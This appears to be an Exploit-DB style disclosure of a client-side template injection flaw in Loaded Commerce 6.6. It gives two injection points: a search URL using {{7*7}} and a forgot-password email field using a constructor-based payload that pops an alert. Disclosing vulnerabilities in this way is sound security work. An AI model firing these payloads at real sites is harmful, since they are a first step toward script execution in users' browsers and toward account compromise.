### Vulnerability Key Information #### Vulnerability Overview - **EDB-ID:** 52084 - **CVE:** N/A - **Author:** tmrswrr - **Type:** WEBAPPS - **Platform:** PHP - **Date:** 2025-03-19 - **Affected Application:** Loaded Commerce 6.6 #### Vulnerability Details - **Vulnerability Type:** Client-Side Template Injection (CSTI) - **Version:** 6.6 - **Test Environment:** https://www.softaculous.com/apps/ecommerce/Loaded_Commerce - **Injection Points:** - **Search Parameter Injection:** ``` https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}} ``` Returns 49, confirming the presence of a template injection vulnerability. - **Forgot Password Page Injection:** ``` https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process ``` Submitting `{{constructor.constructor('alert(1)')()}}` in the email field triggers a pop-up, indicating a client-side code execution vulnerability. #### Additional Information - **Vendor Homepage:** https://loadedcommerce.com/ - **Tags:** None - **Recommendation/Source:** [Link](#) The above information provides a basic description and exploitation method for the Client-Side Template Injection (CSTI) vulnerability in Loaded Commerce 6.6.